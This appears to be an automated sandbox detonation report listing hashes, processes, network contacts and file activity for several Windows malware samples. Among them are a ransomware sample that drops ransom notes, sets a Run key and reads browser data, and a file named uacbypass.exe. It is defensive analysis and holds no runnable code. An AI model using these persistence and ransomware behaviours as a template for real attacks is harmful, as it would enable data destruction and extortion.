| SHA256 | f87964bb48f948ed7fc49858a39a17ae0c7a8b55b0a4cc0037ec6f6b4d5ea335 |
| SHA512 | f0203bb57c1c36852b7ceb90c28310de4448a004b1ed784d37ab05f7e18886ece077886b50c6f7c2f250c0196df8cea92c3e84e577bc43bb494b121d2ba25795 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\headerGRADIENT_Tall.gif
| MD5 | 8961e7d295079a3da8de9c5aa4a819ba |
| SHA1 | 934731afc0065c164ab45335f216790b0ab119b0 |
| SHA256 | c5240b6a850c5116fc7806e010930a63fa28f629ca363868dcad746dcc3c10ed |
| SHA512 | 562b630c5d6df67711413001b6824a7a4bf8205a8b4e0562f249bbe02ca3eb170a9c75e4fd74cf1ab129d8942329a38b142f605d9f7a54fb7b07b3961068eb74 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\help.jpg
| MD5 | 4bd333d90abaa611759c63702460a97e |
| SHA1 | 1bc0aa55c84b4cec249011659d1dd378e8827224 |
| SHA256 | 09a860d631b024dff2ee0286417757f888a21115221c1c7fa8b31cf22b0449e3 |
| SHA512 | 40968cc945139f23e587c8b7990f036d3f61e385bd2eab1d8580ec4125ff30d2889dd5e45b8ad5df9c567e778b8d8d34e6b78d66dbf6b8050cbd9922bf08c439 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\HelpIcon_solid.gif
| MD5 | 88c97f9ae243554565e8def5cab285c8 |
| SHA1 | d30a0eabb88af9ff4cd3554072675965b094304b |
| SHA256 | f675696fdc11ddc4a99fc45c82b70665def2cd9eb47feca3372ea36679d3253c |
| SHA512 | d5a0bc47578f6d5df36654f33d3df293e52f1c6312583a273ff1746176a4507ba5cb4e0e7c237ab19ae2d0d8215c47907e2763422d42e52b35b1b9a52eef474a |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\image1.gif
| MD5 | 65ad39bf7b613ed2991b768c5a53a6bb |
| SHA1 | f74e404612b32cef39de33727652708873d825ef |
| SHA256 | 7bff5df8f5c5e87bc4e4a9cee04de9d14c3e9e23b0f60563f2352a38c39b01ed |
| SHA512 | 18f22e62d8c7fe432aac8e26609c125ce5eba94889c8cf581311dccd7caa2f73d35f6825b39c05f16e131fd771d645eb79c06f4c279a4f0f51231567abf46ff3 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\image2.gif
| MD5 | 642a4f7bda16af066f503a5f102088dd |
| SHA1 | e1536dfdfe9d1e6ed495d04ecdd3e9d1ba4dabc5 |
| SHA256 | 478ae124c83ab5d9dcef2f90606e7f5614f1a72ac3509221ee456d6b38e47465 |
| SHA512 | 078b0be1ee69cbcf320200640d8c66f2776e6065a866789ca7610f577df49748487ae0edd695820cddc22b8c79ef50fa57ef4f2fd4d4320e770716a2e2b8c880 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\requiredBang.gif
| MD5 | c0a36b230311e53a684d35670a60d347 |
| SHA1 | 3aef9426ceb9e6d32110a87e1a34382df520da4d |
| SHA256 | b882c41e9a17264effae0a81103677a351248c3d9c9687b8f33b832428caaafb |
| SHA512 | cf3124b8e9a6e5f75a861522e47d56e21b07007e1819a8874938e0a6f2503478eae00cfb512d5a13977ba6136c61b5fcf00bb099751d130162d8a23a6b235be2 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_leftCorner.gif
| MD5 | e14c7cadfd93f3f1c3aeca220474adfd |
| SHA1 | 1d043b314289718d395f86016f5a56898b95b7b3 |
| SHA256 | 854a3d06095ceb965d0fd3c2b275e4b84cedc05f93c3abedcbbcf2afcf0c1348 |
| SHA512 | a7633878c664da07c7bef1293e4ebfd185a1f4acdecf5ebc49b0a3ab103da16980427e17026920a5c3435c6793e02a32f358e99df14fb45ded2d0ca3edb5043d |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_rightCorner.gif
| MD5 | 26b44f78f18fc0b219e29871667efde5 |
| SHA1 | 74746f735cfaa9c2b9e217821dc61a5ec0000433 |
| SHA256 | 2f40ad49d115567740919bfe99eb0e179d68ee53628b3aabcce265c355cffe53 |
| SHA512 | 83eea8ab21a74333dbb2a5871ebcc45f4acaf21c3a1bb4ab3c5d5cc8888ba52fa08a131a123e3091e72160dff7ea51f3e66b76362ae268658123f20bff4eed3a |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\topGradRepeat.jpg
| MD5 | ebf4afc630984bee8d56d68a63ca540b |
| SHA1 | f415d41514c38f3bb1581c43f3ff5bc275870590 |
| SHA256 | b1eaf5fc907db4aee35549cac6866755cd51610a463abec89b4c62d2d781f760 |
| SHA512 | f63a802ce39e4a25e1cff9de9212cd546df38c5d9f35ed69cc9025175c782546c3f0ccf4b8506a3d8e400f7e9f6a6a3990d7f6ae10d4b9a72ee862790b31d6f7 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\unSelectedTab_leftCorner.gif
| MD5 | 69212e15dc2754acfb98f4fa6939a194 |
| SHA1 | 4c4cac7d83176f40c2cee3dad96a41e7d306fdd8 |
| SHA256 | 3528ecd2134a99c8ed567453257ea29504f1b96744546c339f622abf855b8074 |
| SHA512 | b4900e2c21dba35f5f4d3eeb5deaea4b2e7256b6cf84f2ebd34cc7fec19499dfe64f69002ebf970b7103d591aeec469be22d7970934892dcaf936c63618a640a |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\unSelectedTab_rightCorner.gif
| MD5 | feb5b28daa7551890e6a6397b7e93bde |
| SHA1 | a7b20c3fb24cd64ecca2a4a1f43f4bcb184e8abf |
| SHA256 | 39772bc872af06c80efd8cc80a0023a02fa2a8532a9bd392b503501550e44918 |
| SHA512 | f35366347505f6fc856e61d2457ae63da08444ad0fc6f8d6ee0f21acca80f0abbf8d88147d18d6ed6138aa69cb7d001e7076fde0457a99b372d06a27cb2b654e |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\yellowCORNER.gif
| MD5 | 3d8afe0e5ee0a2e3eca1f1ba36736578 |
| SHA1 | a2189ca542eef367336ef3fe6637c093f7f64a2d |
| SHA256 | 92d74e36a166d280fc2df176b0cbe38cac3346f84324df00922aa099d26d126f |
| SHA512 | 94db04e298ef1e796f793d2ee30dcd6baef04b4ec5a540ed2a23c5ca83c6f7ddf794f5aaf6d55a943de3d21e55bb3ff84e6bbaacda994cd14150c85f056088ad |
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20241010-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Upx.exe
"C:\Users\Admin\AppData\Local\Temp\Upx.exe"
Network
Files
memory/1600-0-0x0000000000400000-0x000000000057E000-memory.dmp
memory/1600-2-0x0000000000400000-0x000000000057E000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
121s
Max time network
124s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2868 wrote to memory of 2088 | N/A | C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe |
| PID 2868 wrote to memory of 2088 | N/A | C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe |
| PID 2868 wrote to memory of 2088 | N/A | C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe | C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe
"C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe"
C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe
"C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gltsapi.coetech.com | udp |
| US | 199.59.243.227:80 | gltsapi.coetech.com | tcp |
Files
memory/2868-0-0x000007FEF56D3000-0x000007FEF56D4000-memory.dmp
memory/2868-1-0x0000000000B30000-0x0000000000FCE000-memory.dmp
memory/2868-2-0x00000000004F0000-0x000000000053C000-memory.dmp
memory/2868-4-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe
| MD5 | e8cc55a833bfd86a6d3c4ad8391050cb |
| SHA1 | dee0d797b0ccf1cd6c47b6c9fa9f157ccf3e4c62 |
| SHA256 | 24b6c0f724c496aefab3e6a58b194213dc4ca4016e50ce8428b4fe15c6b6b240 |
| SHA512 | 9c0639a3efaefd2a0c3dbc2ead4f1314290ac4506997f8026a62be0f641c79509201198bab7bd0496f19875b8571c6fd519520e0b0b4d673ef0121156178fca3 |
memory/2088-9-0x0000000000340000-0x00000000003AC000-memory.dmp
memory/2088-10-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp
memory/2088-11-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp
memory/2868-12-0x000007FEF56D3000-0x000007FEF56D4000-memory.dmp
memory/2868-13-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp
memory/2088-14-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240729-en
Max time kernel
120s
Max time network
122s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\uacbypass.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\uacbypass.exe
"C:\Users\Admin\AppData\Local\Temp\uacbypass.exe"
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe
"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gltsapi.coetech.com | udp |
| US | 199.59.243.227:80 | gltsapi.coetech.com | tcp |
Files
memory/816-0-0x000007FEF4E13000-0x000007FEF4E14000-memory.dmp
memory/816-1-0x00000000013D0000-0x000000000143E000-memory.dmp
memory/816-2-0x000007FEF4E10000-0x000007FEF57FC000-memory.dmp
memory/816-3-0x000007FEF4E13000-0x000007FEF4E14000-memory.dmp
memory/816-4-0x000007FEF4E10000-0x000007FEF57FC000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240708-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2096 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr | C:\Windows\SysWOW64\WerFault.exe |
| PID 2096 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr | C:\Windows\SysWOW64\WerFault.exe |
| PID 2096 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr | C:\Windows\SysWOW64\WerFault.exe |
| PID 2096 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr
"C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr" /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 128
Network
Files
memory/2096-0-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2096-1-0x0000000000400000-0x0000000000410000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20241023-en
Max time kernel
246s
Max time network
123s
Command Line
Signatures
Renames multiple (2207) files with added filename extension
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\drivers\it-IT\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\ja-JP\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\de-DE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\en-US\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\es-ES\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\fr-FR\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Alcmeter = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8i9eHkHOwWwQlX.exe" | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\de-DE\Licenses\OEM\Starter\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnrc004.inf_amd64_neutral_bbd3435eeaf576ee\Amd64\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\wvmbushid.inf_amd64_neutral_6708ad28050a6765\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\es-ES\Licenses\eval\HomePremium\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\InstallShield\setupdir\0c0c\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_functions_advanced.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\blbdrive.inf_amd64_neutral_1aa816fe7dc98c3f\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mcx2.inf_amd64_neutral_8cf9cade8f7bba56\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\_Default\HomePremiumE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\fr-FR\Licenses\eval\Ultimate\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_scopes.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmgl004.inf_amd64_neutral_1874f16002601f78\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnlx00b.inf_amd64_neutral_89b555703683b583\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\wudfusbcciddriver.inf_amd64_neutral_adc3e4acb1046b4b\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\default.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_remote_output.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\brmfcumd.inf_amd64_neutral_db43b26810939b3e\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hpoa1so.inf_amd64_neutral_4f1a3f1015001339\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\_Default\HomeBasic\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmmhzel.inf_amd64_neutral_1292ec506cfc26db\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net8187se64.inf_amd64_neutral_c239ab5d36a3b3e9\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_For.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FZG8CKJ5\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\it-IT\Licenses\_Default\HomePremiumN\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-TextServicesFramework-Migration-DL\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_History.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_providers.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hdaudss.inf_amd64_neutral_330a593eb888237c\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmsonyu.inf_amd64_neutral_45152a8a9362fb82\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_remote_FAQ.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_WS-Management_Cmdlets.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_locations.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Ref.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\fr-FR\Licenses\eval\ProfessionalN\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\it-IT\Licenses\OEM\HomeBasicN\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Comment_Based_Help.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\cdrom.inf_amd64_neutral_0b3d0d1942ab684b\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netg664.inf_amd64_neutral_b4e8ccc6ba210e97\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnkm003.inf_amd64_neutral_48652cda3bb15180\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\eval\Ultimate\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Automatic_Variables.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\lsi_sas.inf_amd64_neutral_a4d6780f72cbd5b4\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnbr00a.inf_amd64_neutral_e7f3f91e6832ef5c\Amd64\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_pssessions.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_jobs.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_objects.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_If.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnge001.inf_amd64_neutral_cfffa4143b3c4592\Amd64\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\migwiz\PostMigRes\Web\base_images\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Path_Syntax.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_pssession_details.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Command_Syntax.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\ph3xibc7.inf_amd64_neutral_348f512722c79525\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\ph3xibc9.inf_amd64_neutral_ff3a566e4b6ba035\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnca003.inf_amd64_neutral_8e91d4aa9330d2f8\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\es-ES\Licenses\eval\StarterN\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\sppui\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Reserved_Words.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_Comparison_Operators.help.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\de-DE\Licenses\_Default\EnterpriseE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
| File created | C:\Windows\SysWOW64\de-DE\Licenses\_Default\UltimateE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
